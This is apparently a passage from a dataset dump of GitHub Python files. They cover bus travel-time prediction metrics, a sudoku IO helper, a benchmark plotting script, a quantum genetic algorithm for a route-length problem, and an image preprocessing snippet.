not in [\"diff\", \"speed\", \"duration\"]:\n raise ValueError(\"data_type must be: diff, speed or duration\")\n\n test_array_cum = self._calc_prediction_cum_journeys(\n self.data, test=test, data_type=data_type\n )\n\n return str(\n self._stats(\n self.actual_array_cum, test_array_cum, name, self.first_20mins_mask\n )\n + str(\"\\n\")\n )\n\n def draw_time(self, data, names, filename=None, data_type=\"duration\"):\n\n if data_type not in [\"diff\", \"speed\", \"duration\"]:\n raise ValueError(\"data_type must be: diff, speed or duration\")\n\n for i in range(len(data)):\n\n plt.plot(\n self._make_accuracy_matrix_minutes(\n self._calc_prediction_cum_journeys(\n self.data, test=data[i], data_type=data_type\n ),\n self.actual_array_cum,\n )[0][0, :],\n label=names[i],\n )\n\n plt.xlim(0, 20)\n plt.title(\"PW10 Scores By How Far\\nIn Advance A Prediction Is\")\n plt.xlabel(\"Time (minutes)\")\n plt.ylabel(\"PW10 Score (%)\")\n plt.legend()\n if filename is not None:\n plt.savefig(filename, bbox_inches=\"tight\")\n plt.show()\n\n def _make_accuracy_matrix_minutes(self, predict, max_threshold=10):\n\n actual_ints = np.array(self.actual_array_cum / 60).astype(int)\n\n rows = 1 # int(max_threshold / 10)\n\n max_a = np.nanmax(self.actual_array_cum) / 60\n\n accuracies_table = np.empty((rows, int(max_a)))\n drift_table = np.empty((rows, int(max_a)))\n frequency = np.empty(int(max_a))\n\n print(\"\")\n\n for i in range(int(max_a)):\n print(\".\", end=\"\", flush=True)\n mask = actual_ints == i\n\n frequency[i] = np.count_nonzero(mask)\n\n for j in range(1, rows + 1):\n accuracy, drift = self._percent_in_x_percent(\n predict[mask], self.actual_array_cum[mask], j * 10\n )\n accuracies_table[j - 1, i] = accuracy\n drift_table[j - 1, i] = drift\n\n return accuracies_table, frequency, drift_table\n\n def _percent_in_x_percent(self, predict, actual, threshold):\n\n if np.count_nonzero(~np.isnan(actual)) == 0:\n return 0, 0\n\n threshold = threshold / 100\n\n mask = ~np.isnan(predict) & ~np.isnan(actual)\n\n pass_count = np.count_nonzero(\n (predict[mask] < actual[mask] * (1 + threshold))\n & (predict[mask] > actual[mask] * (1 - threshold))\n )\n\n over_count = np.count_nonzero(predict[mask] > actual[mask] * (1 + threshold))\n\n under_count = np.count_nonzero(predict[mask] < actual[mask] * (1 - threshold))\n\n pass_percent = pass_count / np.count_nonzero(mask) * 100\n\n if over_count + under_count == 0:\n drift = 0.5\n else:\n drift = over_count / (over_count + under_count)\n\n return pass_percent, drift\n\n def _stats(self, actual_array_cum, test_array_cum, name, first_20mins_mask):\n\n mape_short = self._MAPE(test_array_cum[:, 0], actual_array_cum[:, 0])\n mape_long = self._MAPE(test_array_cum, actual_array_cum)\n # rmse_short = np.sqrt(\n # mean_squared_error(actual_array_cum[:, 0], test_array_cum[:, 0])\n # )\n rmse_short = np.sqrt(\n np.nanmean(np.square(actual_array_cum[:, 0] - test_array_cum[:, 0]))\n )\n rmse_long = np.sqrt(np.nanmean(np.square(actual_array_cum - test_array_cum)))\n # mae_short = mean_absolute_error(actual_array_cum[:, 0], test_array_cum[:, 0])\n mae_short = np.nanmean(np.abs(actual_array_cum[:, 0] - test_array_cum[:, 0]))\n mae_long = np.nanmean(np.abs(actual_array_cum - test_array_cum))\n\n pass_count_short = np.count_nonzero(\n (test_array_cum[:, 0] < actual_array_cum[:, 0] * 1.1)\n & (test_array_cum[:, 0] > actual_array_cum[:, 0] * 0.9)\n )\n\n pass_fraction_short = pass_count_short / actual_array_cum.shape[0]\n\n pass_count_long = np.count_nonzero(\n (\n 
test_array_cum[first_20mins_mask]\n < actual_array_cum[first_20mins_mask] * 1.1\n )\n & (\n test_array_cum[first_20mins_mask]\n > actual_array_cum[first_20mins_mask] * 0.9\n )\n )\n pass_fraction_long = pass_count_long / np.count_nonzero(first_20mins_mask)\n\n results = f\"{name} & {mape_short:0.3f} & {rmse_short:0.3f} & {mae_short:0.3f} & {pass_fraction_short*100:0.3f} & {mape_long:0.3f} & {rmse_long:0.3f} & {mae_long:0.3f} & {pass_fraction_long*100:0.3f} \\\\\\\\\"\n\n print(results)\n\n return results\n\n def _MAPE(self, forecast, actual):\n\n if len(forecast) != len(actual):\n raise ValueError(\n \"Could not calculate MAPE, forecast and actual arrays are different length\"\n )\n\n forecast = np.asarray(forecast)\n actual = np.asarray(actual)\n\n with np.errstate(divide=\"ignore\", invalid=\"ignore\"):\n\n division = (actual - forecast) / actual\n\n division[actual == 0] = 0\n\n valid_count = actual.size - np.count_nonzero(\n (actual == 0) | (np.isnan(actual))\n )\n\n # Instead of dividing by n we count by the number of non-zero and non-nan values.\n # Essentially ignoring all cases where the actual value is zero.\n mape = 100 / valid_count * np.nansum(np.abs(division))\n\n return mape\n\n def _create_padded_array(self, a, row_start, n_rows):\n # From: https://stackoverflow.com/questions/51597849/padding-a-numpy-array-with-offsets-for-each-data-column\n\n r = np.arange(n_rows)[:, None]\n row_start = np.asarray(row_start)\n mask = (r >= row_start) & (r < row_start + a.shape[0])\n\n out = np.zeros(mask.shape, dtype=a.dtype)\n out[:] = np.nan\n out.T[mask.T] = a.ravel(\"F\")\n return out\n\n def _create_triangle(self, input_array, max_width=70):\n\n filled_values = np.empty((input_array.shape[0], 70)).astype(float)\n\n filled_values[:] = input_array[:, None]\n\n return self._create_padded_array(\n filled_values, list(range(70)), input_array.shape[0] + 71\n )[: input_array.shape[0], :70]\n\n def _calc_baseline_and_actual(self, data):\n\n se_min = data.copy()\n\n baseline_array = np.empty((se_min.shape[0], 70)).astype(float)\n baseline_array[:] = np.nan\n\n actual_array = np.empty((se_min.shape[0], 70)).astype(float)\n actual_array[:] = np.nan\n\n baseline_median_array = np.empty((se_min.shape[0], 70)).astype(float)\n baseline_median_array[:] = np.nan\n\n se_min = se_min.reset_index(drop=True)\n\n runs = se_min.groupby([\"date\", \"workid\"])\n\n actual_index = se_min.columns.get_loc(\"segment_duration\")\n baseline_index = se_min.columns.get_loc(\n \"mean_durations_by_segment_code_and_hour_and_day\"\n )\n baseline_median_index = se_min.columns.get_loc(\n \"median_durations_by_segment_code_and_hour_and_day\"\n )\n\n for _, run in runs:\n run = run.sort_values(\"actualArrival\")\n\n baseline_array[run.index, :] = self._create_triangle(\n run.iloc[:, baseline_index]\n )\n actual_array[run.index, :] = self._create_triangle(\n run.iloc[:, actual_index]\n )\n baseline_median_array[run.index, :] = self._create_triangle(\n run.iloc[:, baseline_median_index]\n )\n\n baseline_array_cum = np.cumsum(baseline_array, axis=1)\n actual_array_cum = np.cumsum(actual_array, axis=1)\n baseline_median_array_cum = np.cumsum(baseline_median_array, axis=1)\n\n actual_array_cum = np.clip(actual_array_cum, 0, 2 * 60 * 60)\n\n return baseline_array_cum, actual_array_cum, baseline_median_array_cum\n\n def _calc_prediction_cum_journeys(self, data, test, data_type=\"diff\"):\n\n se_min = data[\n [\n \"date\",\n \"workid\",\n \"actualArrival\",\n \"mean_durations_by_segment_code_and_hour_and_day\",\n ]\n ].copy()\n\n if 
data_type == \"diff\":\n se_min[\"prediction\"] = se_min[\n \"mean_durations_by_segment_code_and_hour_and_day\"\n ] * (1 + (test / 100))\n\n if data_type == \"speed\":\n se_min[\"prediction\"] = se_min[\"real_length\"] / test * 2.237\n\n if data_type == \"duration\":\n se_min[\"prediction\"] = test\n\n predict_array = np.empty((se_min.shape[0], 70)).astype(float)\n predict_array[:] = np.nan\n\n se_min = se_min.reset_index(drop=True)\n\n runs = se_min.groupby([\"date\", \"workid\"])\n\n prediction_index = se_min.columns.get_loc(\"prediction\")\n\n for _, run in runs:\n run = run.sort_values(\"actualArrival\")\n\n predict_array[run.index, :] = self._create_triangle(\n run.iloc[:, prediction_index]\n )\n\n predict_array_cum = np.cumsum(predict_array, axis=1)\n\n return predict_array_cum\n","repo_name":"gingertom/buses","sub_path":"pipeline/utils/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":11227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34079169941","text":"class IOmanager:\r\n def origin(self):\r\n with open(\"bras/config.txt\") as lines:\r\n \r\n values = [float(n.split(' ')[-1]) for n in lines]\r\n\r\n return values[0], values[1]\r\n\r\n def sudoku(self):\r\n with open(f\"generated_data/resolved_sudoku.txt\") as lines:\r\n sudoku = [\r\n [int(number) for number in n if (number != '\\n')]\r\n for n in lines\r\n ]\r\n return sudoku\r\n","repo_name":"Wermarty/Sudoku-Solver","sub_path":"project/bras/IOmanager.py","file_name":"IOmanager.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6411783027","text":"#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntcpReadsRaw1G = (0.808, 0.7939, 0.8139)\ntcpReadsAvg1G = np.average(tcpReadsRaw1G)\ntcpReadsStd1G = np.std(tcpReadsRaw1G)\n\ntcpReadsNcRaw1G = (0.88606, 0.83474, 0.88464)\ntcpReadsNcAvg1G = np.average(tcpReadsNcRaw1G)\ntcpReadsNcStd1G = np.std(tcpReadsNcRaw1G)\n\nscrReadsRaw1G = (1.9305, 1.9526, 1.9529)\nscrReadsAvg1G = np.average(scrReadsRaw1G)\nscrReadsStd1G = np.std(scrReadsRaw1G)\n\nscrReadsNcRaw1G = (2.3661, 2.3495, 2.3445)\nscrReadsNcAvg1G = np.average(scrReadsNcRaw1G)\nscrReadsNcStd1G = np.std(scrReadsNcRaw1G)\n\nzcrReadsNcRaw1G = (5.8865, 5.8788, 5.8646)\nzcrReadsNcAvg1G = np.average(zcrReadsNcRaw1G)\nzcrReadsNcStd1G = np.std(zcrReadsNcRaw1G)\n\nN = 5\noneGbMeans = (tcpReadsAvg1G, tcpReadsNcAvg1G, scrReadsAvg1G, scrReadsNcAvg1G, zcrReadsNcAvg1G)\noneGbStd = (tcpReadsStd1G, tcpReadsNcStd1G, scrReadsStd1G, scrReadsNcStd1G, zcrReadsNcStd1G)\n\nind = np.arange(N)\nbarwidth = 0.35\n\nfig, ax = plt.subplots()\nrects1 = ax.bar(ind, oneGbMeans, barwidth, color='r', yerr=oneGbStd)\n\ntcpReadsRaw20G = ( 0.78764, 0.75296, 0.78238 )\ntcpReadsAvg20G = np.average(tcpReadsRaw20G)\ntcpReadsStd20G = np.std(tcpReadsRaw20G)\n\ntcpReadsNcRaw20G = ( 0.9147, 0.9244, 0.888 )\ntcpReadsNcAvg20G = np.average(tcpReadsNcRaw20G)\ntcpReadsNcStd20G = np.std(tcpReadsNcRaw20G)\n\nscrReadsRaw20G = (1.9387, 1.9295, 1.9342)\nscrReadsAvg20G = np.average(scrReadsRaw20G)\nscrReadsStd20G = np.std(scrReadsRaw20G)\n\nscrReadsNcRaw20G = (2.2875, 2.3336, 2.3552)\nscrReadsNcAvg20G = np.average(scrReadsNcRaw20G)\nscrReadsNcStd20G = np.std(scrReadsNcRaw20G)\n\nzcrReadsRaw20G = (2.675, 2.654, 2.633)\nzcrReadsAvg20G = np.average(zcrReadsRaw20G)\nzcrReadsStd20G = np.std(zcrReadsRaw20G)\n\ntwentyGbMeans = (tcpReadsAvg20G, tcpReadsNcAvg20G, scrReadsAvg20G, 
scrReadsNcAvg20G, zcrReadsAvg20G)\ntwentyGbStd = (tcpReadsStd20G, tcpReadsNcStd20G, scrReadsStd20G, scrReadsNcStd20G, zcrReadsStd20G)\nrects2 = ax.bar(ind+barwidth, twentyGbMeans, barwidth, color='y', yerr=twentyGbStd)\n\n# add some text for labels, title and axis tick labels\nax.set_ylabel('GB/s')\nax.set_title('vecsum2 throughput')\nax.set_xticks(ind+barwidth)\nax.set_xticklabels( ('TCP', 'TCP-no-csum', 'SCR', 'SCR-no-csum', 'zero-copy') )\n\nax.legend( (rects1[0], rects2[0]), ('1 GB', '20 GB'), loc='upper left')\n\nplt.savefig(\"micro1.png\")\n\n","repo_name":"umbrant/caching_benchmarking","sub_path":"graphs/micro1.py","file_name":"micro1.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"2392449503","text":"#########################################################\r\n# #\r\n# QUANTUM GENETIC ALGORITHM (24.05.2016) #\r\n# #\r\n# R. Lahoz-Beltra #\r\n# #\r\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR \"AS IS\" AND #\r\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #\r\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY #\r\n# AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\r\n# THE SOFTWARE CAN BE USED BY ANYONE SOLELY FOR THE #\r\n# PURPOSES OF EDUCATION AND RESEARCH. #\r\n#########################################################\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\nfrom numpy import testing\r\nfrom numpy.core.fromnumeric import ptp\r\n\r\n#########################################################\r\n# ALGORITHM PARAMETERS #\r\n#########################################################\r\nN = 50 # Define here the population size\r\nGenome = 22 # Define here the chromosome length\r\ngeneration_max = 450 # Define here the maximum number of\r\n# generations/iterations\r\n\r\n#########################################################\r\n# VARIABLES ALGORITHM #\r\n#########################################################\r\npopSize = N+1\r\ngenomeLength = Genome+1\r\ntop_bottom = 3\r\nQuBitZero = np.array([[1], [0]])\r\nQuBitOne = np.array([[0], [1]])\r\nAlphaBeta = np.empty([top_bottom])\r\nfitness = np.empty([popSize])\r\nprobability = np.empty([popSize])\r\n# qpv: quantum chromosome (or population vector, QPV)\r\nqpv = np.empty([popSize, genomeLength, top_bottom])\r\nnqpv = np.empty([popSize, genomeLength, top_bottom])\r\n# chromosome: classical chromosome\r\nchromosome = np.empty([popSize, genomeLength], dtype=int)  # np.int was removed from NumPy; the builtin int is equivalent\r\nchild1 = np.empty([popSize, genomeLength, top_bottom])\r\nchild2 = np.empty([popSize, genomeLength, top_bottom])\r\nbest_chrom = np.empty([generation_max])\r\n\r\n# Initialization global variables\r\ntheta = 0\r\niteration = 0\r\nthe_best_chrom = 0\r\ngeneration = 0\r\n#########################################################\r\n# QUANTUM POPULATION INITIALIZATION #\r\n#########################################################\r\ntest = []\r\nobj = [[0, 0], [-14, 60], [-18, 59], [39, 41], [85, 16],\r\n [16, 96], [96, 55], [75, 36], [11, 23], [75, 8], [32, 18]]\r\n\r\nrt = np.zeros(int(math.pow(2, Genome)))\r\n\r\n\r\ndef Init_sample():\r\n data = np.loadtxt('output_2.dat')\r\n for i in range(int(math.pow(2, Genome))):\r\n rt[i] = 99999999999\r\n # plot the first column as x, and second column as y\r\n rt_tmp = data[:, 1]\r\n k = 0\r\n for j in rt_tmp:\r\n rt[k] = j\r\n print(rt[k])\r\n k += 1\r\n\r\n\r\ndef Init_population():\r\n # Hadamard gate\r\n r2 = math.sqrt(2.0)\r\n h = np.array([[1/r2, 1/r2], 
[1/r2, -1/r2]])\r\n # Rotation Q-gate\r\n theta = 0\r\n rot = np.empty([2, 2])\r\n # Initial population array (individual x chromosome)\r\n i = 1\r\n j = 1\r\n for i in range(1, popSize):\r\n for j in range(1, genomeLength):\r\n theta = np.random.uniform(0, 1)*90\r\n theta = math.radians(theta)\r\n rot[0, 0] = math.cos(theta)\r\n rot[0, 1] = -math.sin(theta)\r\n rot[1, 0] = math.sin(theta)\r\n rot[1, 1] = math.cos(theta)\r\n AlphaBeta[0] = rot[0, 0] * \\\r\n (h[0][0]*QuBitZero[0])+rot[0, 1]*(h[0][1]*QuBitZero[1])\r\n AlphaBeta[1] = rot[1, 0] * \\\r\n (h[1][0]*QuBitZero[0])+rot[1, 1]*(h[1][1]*QuBitZero[1])\r\n # alpha squared\r\n qpv[i, j, 0] = np.around(2*pow(AlphaBeta[0], 2), 2)\r\n # beta squared\r\n qpv[i, j, 1] = np.around(2*pow(AlphaBeta[1], 2), 2)\r\n\r\n # i = 0\r\n # for j in range(1, 10):\r\n # route = distance((obj[j][0]-obj[0][0]), (obj[j][1]-obj[0][1]))\r\n # print(\"j is:\", j)\r\n # for l in range(1, 10):\r\n # if l == j:\r\n # continue\r\n # print(\"l is:\", l)\r\n # route = route + \\\r\n # distance((obj[l][0]-obj[j][0]), (obj[l][1]-obj[j][1]))\r\n # for a in range(1, 10):\r\n # if a == l or a == j:\r\n # continue\r\n # print(\"a is:\", a)\r\n # print(j, l, a, \"\\n\")\r\n # route = route + \\\r\n # distance((obj[a][0]-obj[l][0]),\r\n # (obj[a][1]-obj[l][1]))\r\n # route = route + \\\r\n # distance((obj[0][0]-obj[a][0]),\r\n # (obj[0][1]-obj[a][1]))\r\n # rt[i] = route\r\n # i += 1\r\n\r\n # k = 0\r\n # for i in range(1, 11):\r\n # route_i = distance((obj[i][0]-obj[0][0]), (obj[i][1]-obj[0][1]))\r\n # for j in range(1, 11):\r\n # if j == i:\r\n # continue\r\n # route_j = route_i + \\\r\n # distance((obj[j][0]-obj[i][0]), (obj[j][1]-obj[i][1]))\r\n # for l in range(1, 11):\r\n # if l == i or l == j:\r\n # continue\r\n # route_l = route_j + \\\r\n # distance((obj[l][0]-obj[j][0]), (obj[l][1]-obj[j][1]))\r\n # for a in range(1, 11):\r\n # if a == i or a == j or a == l:\r\n # continue\r\n # route_a = route_l + \\\r\n # distance((obj[a][0]-obj[l][0]), (obj[a][1]-obj[l][1]))\r\n # for b in range(1, 11):\r\n # if b == i or b == j or b == l or b == a:\r\n # continue\r\n # route_b = route_a + \\\r\n # distance((obj[b][0]-obj[a][0]),\r\n # (obj[b][1]-obj[a][1]))\r\n # for c in range(1, 11):\r\n # if c == i or c == j or c == l or c == a or c == b:\r\n # continue\r\n # route_c = route_b + \\\r\n # distance((obj[c][0]-obj[b][0]),\r\n # (obj[c][1]-obj[b][1]))\r\n # for d in range(1, 11):\r\n # if d == i or d == j or d == l or d == a or d == b or d == c:\r\n # continue\r\n # route_d = route_c + \\\r\n # distance((obj[d][0]-obj[c][0]),\r\n # (obj[d][1]-obj[c][1]))\r\n # for e in range(1, 11):\r\n # if e == i or e == j or e == l or e == a or e == b or e == c or e == d:\r\n # continue\r\n # route_e = route_d + \\\r\n # distance(\r\n # (obj[e][0]-obj[d][0]), (obj[e][1]-obj[d][1]))\r\n # for f in range(1, 11):\r\n # if f == i or f == j or f == l or f == a or f == b or f == c or f == d or f == e:\r\n # continue\r\n # route_f = route_e + \\\r\n # distance(\r\n # (obj[f][0]-obj[e][0]), (obj[f][1]-obj[e][1]))\r\n # for g in range(1, 11):\r\n # if g == i or g == j or g == l or g == a or g == b or g == c or g == d or g == e or g == f:\r\n # continue\r\n # route_g = route_f + \\\r\n # distance(\r\n # (obj[g][0]-obj[f][0]), (obj[g][1]-obj[f][1]))\r\n # route_0 = route_g + \\\r\n # distance(\r\n # (obj[0][0]-obj[g][0]), (obj[0][1]-obj[g][1]))\r\n # print(i, j, l, a, b, c, d, e, f, g)\r\n # print(\"\")\r\n # fi = open(\"output_2.dat\", \"a\")\r\n # # f.write(str(generation)+\" 
\"+str(fitness_average)+\"\\n\")\r\n # fi.write(\r\n # str(k)+\" \"+str(route_0)+\"\\n\")\r\n # fi.write(\" \\n\")\r\n # fi.close()\r\n # rt[k] = route_0\r\n # print(route_0)\r\n\r\n # k += 1\r\n\r\n\r\ndef distance(x, y):\r\n r = math.sqrt(pow(x, 2) * pow(y, 2))\r\n return r\r\n\r\n\r\n#########################################################\r\n# SHOW QUANTUM POPULATION #\r\n#########################################################\r\n\r\n\r\ndef Show_population():\r\n i = 1\r\n j = 1\r\n for i in range(1, popSize):\r\n print()\r\n print()\r\n print(\"qpv = \", i, \" : \")\r\n print()\r\n for j in range(1, genomeLength):\r\n print(qpv[i, j, 0], end=\"\")\r\n print(\" \", end=\"\")\r\n print()\r\n for j in range(1, genomeLength):\r\n print(qpv[i, j, 1], end=\"\")\r\n print(\" \", end=\"\")\r\n print()\r\n\r\n#########################################################\r\n# MAKE A MEASURE #\r\n#########################################################\r\n# p_alpha: probability of finding qubit in alpha state\r\n\r\n\r\ndef Measure(p_alpha):\r\n for i in range(1, popSize):\r\n print()\r\n for j in range(1, genomeLength):\r\n if p_alpha <= qpv[i, j, 0]:\r\n chromosome[i, j] = 0\r\n else:\r\n chromosome[i, j] = 1\r\n print(chromosome[i, j], \" \", end=\"\")\r\n print()\r\n\r\n#########################################################\r\n# FITNESS EVALUATION #\r\n#########################################################\r\n\r\n\r\ndef Fitness_evaluation(generation):\r\n i = 1\r\n j = 1\r\n fitness_total = 0\r\n sum_sqr = 0\r\n fitness_average = 0\r\n variance = 0\r\n for i in range(1, popSize):\r\n fitness[i] = 0\r\n\r\n#########################################################\r\n# Define your problem in this section. For instance: #\r\n# #\r\n# Let f(x)=abs(x-5/2+sin(x)) be a function that takes #\r\n# values in the range 0<=x<=15. Within this range f(x) #\r\n# has a maximum value at x=11 (binary is equal to 1011) #\r\n#########################################################\r\n for i in range(1, popSize):\r\n x = 0\r\n for j in range(1, genomeLength):\r\n # translate from binary to decimal value\r\n x = x + chromosome[i, j]*pow(2, genomeLength-j-1)\r\n # replaces the value of x in the function f(x)\r\n # y = np.fabs((x-5)/(2+np.sin(x)))\r\n # the fitness value is calculated below:\r\n # (Note that in this example is multiplied\r\n # by a scale value, e.g. 
100)\r\n # print(\"x is\", x, \"\\n\")\r\n y = rt[x]\r\n # print(\"y is\", y, \"\\n\")\r\n fitness[i] = y * 100\r\n#########################################################\r\n\r\n print(\"fitness\", i, \"=\", fitness[i])\r\n fitness_total = fitness_total + fitness[i]\r\n fitness_average = fitness_total/N\r\n i = 1\r\n while i <= N:\r\n # sum_sqr = sum_sqr+pow(fitness[i]-fitness_average, 2)\r\n sum_sqr = sum_sqr+pow(fitness[i]-fitness_average, 2)\r\n i = i+1\r\n variance = sum_sqr/N\r\n if variance <= 1.0e-4:\r\n variance = 0.0\r\n # Best chromosome selection\r\n the_best_chrom = 0\r\n fitness_max = fitness[1]\r\n for i in range(1, popSize):\r\n if fitness[i] <= fitness_max:\r\n fitness_max = fitness[i]\r\n the_best_chrom = i\r\n best_chrom[generation] = the_best_chrom\r\n # Statistical output\r\n print(\"the best num is:\", the_best_chrom)\r\n print(\"the distance is :\", fitness_max/100)\r\n f = open(\"output.dat\", \"a\")\r\n # f.write(str(generation)+\" \"+str(fitness_average)+\"\\n\")\r\n f.write(str(generation)+\" \"+str(fitness_max/100)+\"\\n\")\r\n f.write(\" \\n\")\r\n f.close()\r\n if generation == 449:\r\n return fitness_max/100\r\n else:\r\n return 0\r\n # print(\"Population size = \", popSize - 1)\r\n # print(\"mean fitness = \", fitness_average)\r\n # print(\"variance = \", variance, \"\\n\",\r\n # \" Std. deviation = \", math.sqrt(variance))\r\n # print(\"fitness max = \", best_chrom[generation])\r\n # print(\"fitness sum = \", fitness_total)\r\n\r\n#########################################################\r\n# QUANTUM ROTATION GATE #\r\n#########################################################\r\n\r\n\r\ndef rotation():\r\n rot = np.empty([2, 2])\r\n # Lookup table of the rotation angle\r\n for i in range(1, popSize):\r\n for j in range(1, genomeLength):\r\n if fitness[i] < fitness[int(best_chrom[generation])]:\r\n # if chromosome[i,j]==0 and chromosome[best_chrom[generation],j]==0:\r\n if chromosome[i, j] == 0 and chromosome[int(best_chrom[generation]), j] == 1:\r\n # Define the rotation angle: delta_theta (e.g. 0.0785398163)\r\n delta_theta = 0.0785398163\r\n rot[0, 0] = math.cos(delta_theta)\r\n rot[0, 1] = -math.sin(delta_theta)\r\n rot[1, 0] = math.sin(delta_theta)\r\n rot[1, 1] = math.cos(delta_theta)\r\n nqpv[i, j, 0] = (rot[0, 0]*qpv[i, j, 0]) + \\\r\n (rot[0, 1]*qpv[i, j, 1])\r\n nqpv[i, j, 1] = (rot[1, 0]*qpv[i, j, 0]) + \\\r\n (rot[1, 1]*qpv[i, j, 1])\r\n qpv[i, j, 0] = round(nqpv[i, j, 0], 2)\r\n qpv[i, j, 1] = round(1-nqpv[i, j, 0], 2)\r\n if chromosome[i, j] == 1 and chromosome[int(best_chrom[generation]), j] == 0:\r\n # Define the rotation angle: delta_theta (e.g. 
-0.0785398163)\r\n delta_theta = -0.0785398163\r\n rot[0, 0] = math.cos(delta_theta)\r\n rot[0, 1] = -math.sin(delta_theta)\r\n rot[1, 0] = math.sin(delta_theta)\r\n rot[1, 1] = math.cos(delta_theta)\r\n nqpv[i, j, 0] = (rot[0, 0]*qpv[i, j, 0]) + \\\r\n (rot[0, 1]*qpv[i, j, 1])\r\n nqpv[i, j, 1] = (rot[1, 0]*qpv[i, j, 0]) + \\\r\n (rot[1, 1]*qpv[i, j, 1])\r\n qpv[i, j, 0] = round(nqpv[i, j, 0], 2)\r\n qpv[i, j, 1] = round(1-nqpv[i, j, 0], 2)\r\n # if chromosome[i,j]==1 and chromosome[best_chrom[generation],j]==1:\r\n\r\n#########################################################\r\n# X-PAULI QUANTUM MUTATION GATE #\r\n#########################################################\r\n# pop_mutation_rate: mutation rate in the population\r\n# mutation_rate: probability of a mutation of a bit\r\n\r\n\r\ndef mutation(pop_mutation_rate, mutation_rate):\r\n\r\n for i in range(1, popSize):\r\n up = np.random.randint(1, 101)  # randint replaces the removed random_integers\r\n up = up/100\r\n if up <= pop_mutation_rate:\r\n for j in range(1, genomeLength):\r\n um = np.random.randint(1, 101)\r\n um = um/100\r\n if um <= mutation_rate:\r\n nqpv[i, j, 0] = qpv[i, j, 1]\r\n nqpv[i, j, 1] = qpv[i, j, 0]\r\n else:\r\n nqpv[i, j, 0] = qpv[i, j, 0]\r\n nqpv[i, j, 1] = qpv[i, j, 1]\r\n else:\r\n for j in range(1, genomeLength):\r\n nqpv[i, j, 0] = qpv[i, j, 0]\r\n nqpv[i, j, 1] = qpv[i, j, 1]\r\n for i in range(1, popSize):\r\n for j in range(1, genomeLength):\r\n qpv[i, j, 0] = nqpv[i, j, 0]\r\n qpv[i, j, 1] = nqpv[i, j, 1]\r\n\r\n#########################################################\r\n# PERFORMANCE GRAPH #\r\n#########################################################\r\n# Read the Docs in http://matplotlib.org/1.4.1/index.html\r\n\r\n\r\ndef plot_Output():\r\n data = np.loadtxt('best_result.dat')\r\n # plot the first column as x, and second column as y\r\n y = data[:, 0]\r\n x = data[:, 1]\r\n # f = plt.figure()\r\n # plt.show()  # premature show would open an empty figure\r\n plt.plot(y, x)\r\n plt.xlabel('Exercise times')\r\n plt.ylabel('the best distance')\r\n plt.xlim(0, 50)\r\n plt.show()\r\n\r\n########################################################\r\n# #\r\n# MAIN PROGRAM #\r\n# #\r\n########################################################\r\n\r\n\r\ndef Q_GA():\r\n generation = 0\r\n print(\"============== GENERATION: \", generation,\r\n \" =========================== \")\r\n print()\r\n\r\n Init_population()\r\n Show_population()\r\n Measure(0.5)\r\n Fitness_evaluation(generation)\r\n for i in range(0, popSize):\r\n if i == 0:\r\n for j in range(0, genomeLength):\r\n chromosome[i, j] = 0\r\n chromosome[i, 0] = 0\r\n while (generation < generation_max-1):\r\n print(\"The best of generation [\",\r\n generation, \"] \", best_chrom[generation])\r\n print()\r\n print(\"============== GENERATION: \", generation +\r\n 1, \" =========================== \")\r\n print()\r\n rotation()\r\n mutation(0.01, 0.001)\r\n generation = generation+1\r\n Measure(0.5)\r\n re = Fitness_evaluation(generation)\r\n return re\r\n\r\n\r\nprint(\"\"\"QUANTUM GENETIC ALGORITHM\"\"\")\r\nf = open(\"output.dat\", \"w\")\r\n# fi = open(\"output_2.dat\", \"w\")\r\nfi3 = open(\"best_result.dat\", \"w\")\r\n\r\n\r\ninput(\"Press Enter to continue...\")\r\nInit_sample()\r\nfor i in range(50):\r\n max = Q_GA()\r\n fi3 = open(\"best_result.dat\", \"a\")\r\n # f.write(str(generation)+\" \"+str(fitness_average)+\"\\n\")\r\n fi3.write(str(i)+\" \"+str(max)+\"\\n\")\r\n fi3.write(\" \\n\")\r\n fi3.close()\r\n# Init_population()\r\n# 
print(rt)\r\nplot_Output()\r\n","repo_name":"tku-iarc/timda-mobile","sub_path":"strategy/script/timda-advance/QGA.py","file_name":"QGA.py","file_ext":"py","file_size_in_byte":18820,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"32992627831","text":"def solution(citations):\n    answer = 0\n    citations.sort(reverse = True)\n    for i in range(len(citations),-1,-1):\n        count = 0\n        for j in citations:\n            if j >= i:\n                count+=1\n        if count >= i and len(citations)-count <=i:\n            return i","repo_name":"kimdahee7/CodingTest_Python","sub_path":"프로그래머스/2/42747. H-Index/H-Index.py","file_name":"H-Index.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12111777204","text":"\"\"\"\n\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n\ndef createPreview(image_name, prev_image_name):\n    src = cv2.imread(image_name, cv2.IMREAD_COLOR)\n\n    prev = cv2.resize(src, dsize=(340, 240), fx=0.3, fy=0.7, interpolation=cv2.INTER_LINEAR)\n\n    cv2.imwrite(prev_image_name, prev)\n\ndef preProcess(image_name, target_image_name, gray, threashold):\n    # Check Parameters\n    # print(\"gray: {gray}, threashold: {threashold}\".format(gray=gray, threashold=threashold))\n\n    # Import image to edit\n    src = cv2.imread(image_name, cv2.IMREAD_COLOR)\n\n    is_edited = False\n\n    if gray:\n        src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n        is_edited = True\n    \n    if (gray & threashold):\n        # src = cv2.adaptiveThreshold(src, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 15, 2)\n        ret, src = cv2.threshold(src, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n        